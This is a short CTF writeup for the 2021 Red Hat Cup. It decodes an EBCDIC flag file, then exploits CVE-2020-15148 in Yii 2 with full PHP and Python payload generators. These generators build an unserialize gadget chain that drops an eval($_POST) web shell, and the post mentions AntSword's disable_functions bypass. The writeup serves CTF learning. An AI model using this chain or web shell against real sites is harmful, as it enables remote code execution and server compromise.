Quick filler post: 红帽杯 2021 (Red Hat Cup) writeup

I basically didn't do it; I went out with my girlfriend.

Sign-in

The file is EBCDIC, IBM's 8-bit character encoding, still used on its mainframes. It fills the same role as ASCII but lays the characters out differently (lowercase letters in 0x81-0xA9, uppercase in 0xC1-0xE9, digits in 0xF0-0xF9), so in an ASCII viewer the text shows up as high bytes and dots.

Open the file in WinHex and translate it by hand against IBM's EBCDIC-to-ASCII table: https://www.ibm.com/docs/en/iis/11.7?topic=tables-ebcdic-ascii

flag{we1c0me_t0_redhat2021}
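The manual table lookup can be automated. The following is an added example (mine, not code from the original writeup) that spots an EBCDIC file from its byte distribution and decodes it with the IBM code pages Python ships with. The sample bytes are constructed here from the flag for illustration, and the code-page list and the `flag{` marker are my assumptions, not anything from the challenge.

```python
import string

# Constructed sample: the flag as it would sit in an EBCDIC (CP037) file.
# Built here for illustration; this is not the challenge attachment.
SAMPLE_EBCDIC = "flag{we1c0me_t0_redhat2021}\n".encode("cp037")

# EBCDIC code pages available in Python's codec registry; CP037 (US/Canada)
# and CP500 (international) are the usual suspects for CTF files.
EBCDIC_CODEPAGES = ("cp037", "cp500", "cp1140", "cp273", "cp1026")


def hexdump(data: bytes, width: int = 16) -> str:
    """WinHex-style view: offset, hex bytes, ASCII column. EBCDIC text shows
    up as dots in the ASCII column, the first hint that the file is not
    ASCII."""
    rows = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hex_part = " ".join(f"{b:02x}" for b in chunk)
        txt_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        rows.append(f"{off:08x}  {hex_part:<{width * 3}} {txt_part}")
    return "\n".join(rows)


def is_probably_ebcdic(data: bytes) -> bool:
    """Cheap classifier: ASCII text lives in 0x20-0x7e, while EBCDIC letters
    and digits live in 0x81-0xa9, 0xc1-0xe9 and 0xf0-0xf9. If most bytes sit
    in those high ranges, try EBCDIC before anything else."""
    if not data:
        return False
    high = sum(1 for b in data
               if 0x81 <= b <= 0xA9 or 0xC1 <= b <= 0xE9 or 0xF0 <= b <= 0xF9)
    return high / len(data) > 0.5


def printable_ratio(text: str) -> float:
    """Fraction of printable characters; used to rank candidate decodes."""
    if not text:
        return 0.0
    return sum(c in string.printable for c in text) / len(text)


def decode_ebcdic(data: bytes, codepage: str = "cp037") -> str:
    """The same translation as the manual table lookup, done by the codec."""
    return data.decode(codepage)


def find_flag(data: bytes, marker: str = "flag{"):
    """Try each EBCDIC code page; return (codepage, text) for the first decode
    that contains the marker, or None if none does."""
    for cp in EBCDIC_CODEPAGES:
        try:
            text = data.decode(cp)
        except UnicodeDecodeError:
            continue
        if marker in text:
            return cp, text.strip()
    return None


if __name__ == "__main__":
    print(hexdump(SAMPLE_EBCDIC))
    print("looks like EBCDIC:", is_probably_ebcdic(SAMPLE_EBCDIC))
    print(find_flag(SAMPLE_EBCDIC))
```

If the file decodes cleanly under more than one code page, the differences are confined to punctuation (brackets, `!`, `^`, `|`), so check those characters against the IBM table before trusting the flag.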

web2


The target runs on the Yii framework.

CVE-2020-15148: Yii 2 before 2.0.38 is exploitable through unserialize() of attacker-controlled data, using yii\db\BatchQueryResult::__destruct() as the entry point of the gadget chain (2.0.38 closes it by throwing from __wakeup()).

https://www.cnblogs.com/2rsh0u/p/13714923.html

The site leaks its source as www.zip, which confirms the vulnerable version and the classes below. The PoC is as follows:

<?php
// PoC for CVE-2020-15148 (Yii 2 < 2.0.38): a POP chain that starts in
// yii\db\BatchQueryResult::__destruct() and ends in assert() running
// attacker-controlled PHP. The classes below are stand-ins that only declare
// the properties the chain needs; the real methods run on the target when the
// payload is unserialized.
namespace yii\rest{
    // Sink: CreateAction::run() does call_user_func($this->checkAccess, $this->id).
    // With checkAccess = 'assert', $id is evaluated as PHP code (PHP 7 only).
    class CreateAction{
        public $checkAccess;
        public $id;
 
        public function __construct(){
            $this->checkAccess = 'assert';
            // Drop a one-line shell. '_POS'.'T' is joined here, so the
            // serialized string simply contains $_POST.
            $this->id = 'file_put_contents("8.php",\'<?php eval($_POS'.'T["x"])?>\');';
        }
    }
}
 
namespace Faker{
    use yii\rest\CreateAction;
 
    // Faker\Generator::__call('close') looks up $this->formatters['close']
    // and invokes it, so any callable placed there runs.
    class Generator{
        protected $formatters;
 
        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}
 
namespace yii\db{
    use Faker\Generator;
 
    // Entry point: __destruct() -> reset() -> $this->_dataReader->close().
    // Generator has no close(), so the call lands in __call().
    class BatchQueryResult{
        private $_dataReader;
 
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    // The serialized bytes contain NULs (private/protected name mangling),
    // hence base64 before urlencode.
    echo urlencode(base64_encode(serialize(new yii\db\BatchQueryResult)));
}
?>


Send the generated payload to write the one-line shell. Note that the trick relies on assert() evaluating a string argument, which needs PHP 7 with zend.assertions enabled; PHP 8 no longer treats the string as code.
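When no PHP interpreter is at hand, the same payload can be generated from Python. This is an added example, not part of the original writeup: it implements just enough of PHP's serialize() format (including the NUL-byte mangling of protected and private property names that makes the base64 step necessary) to emit the chain above, then base64- and URL-encodes it the way the PHP PoC does. The shell filename `8.php` and parameter `x` are taken from the PoC; nothing here is Yii's or Faker's own code.

```python
import base64
import urllib.parse


class PhpObject:
    """A PHP object to serialise. props is a list of (name, visibility, value)
    in declaration order; visibility is 'public', 'protected' or 'private'."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def _prop_name(obj_cls, name, visibility):
    """PHP mangles non-public property names with NUL bytes. These bytes are
    why the payload must be base64-encoded before URL-encoding: pasted raw,
    the NULs are silently lost and the chain never fires."""
    if visibility == "public":
        return name
    if visibility == "protected":
        return "\0*\0" + name
    if visibility == "private":
        return "\0" + obj_cls + "\0" + name
    raise ValueError("unknown visibility: " + visibility)


def php_serialize(value) -> str:
    """Subset of PHP serialize(): null, bool, int, string, array, object."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP string lengths are byte lengths, not character counts.
        return 's:%d:"%s";' % (len(value.encode()), value)
    if isinstance(value, list):
        value = dict(enumerate(value))  # PHP lists are int-keyed arrays
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(_prop_name(value.cls, n, vis)) + php_serialize(v)
            for n, vis, v in value.props
        )
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError("cannot serialise %r" % type(value))


def build_yii_chain(webshell_name="8.php", cmd_param="x") -> PhpObject:
    """Same gadget chain as the PHP PoC:
    BatchQueryResult::__destruct -> reset -> _dataReader->close()
    -> Faker\\Generator::__call -> formatters['close']
    -> CreateAction::run -> call_user_func('assert', $id)."""
    # The PHP PoC splits '$_POS'.'T' only in its own source; the serialized
    # payload contains the joined string, so write it joined here.
    php_code = 'file_put_contents("%s",\'<?php eval($_POST["%s"])?>\');' % (
        webshell_name, cmd_param)
    action = PhpObject("yii\\rest\\CreateAction", [
        ("checkAccess", "public", "assert"),
        ("id", "public", php_code),
    ])
    generator = PhpObject("Faker\\Generator", [
        ("formatters", "protected", {"close": [action, "run"]}),
    ])
    return PhpObject("yii\\db\\BatchQueryResult", [
        ("_dataReader", "private", generator),
    ])


def encode_payload(obj) -> str:
    """base64 then urlencode, matching urlencode(base64_encode(serialize()))."""
    raw = php_serialize(obj).encode()
    return urllib.parse.quote(base64.b64encode(raw).decode(), safe="")


def decode_payload(encoded: str) -> str:
    """Reverse of encode_payload, handy for checking what will be sent."""
    return base64.b64decode(urllib.parse.unquote(encoded)).decode()


if __name__ == "__main__":
    print(encode_payload(build_yii_chain()))
```

The NUL bytes in `\0*\0formatters` and `\0yii\db\BatchQueryResult\0_dataReader` are the usual reason a hand-edited payload stops working; regenerate the whole string rather than editing the base64 output.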

Many functions are blocked by disable_functions, so use the bypass plugin that ships with AntSword (蚁剑) to get command execution through the shell.


That yields the flag.
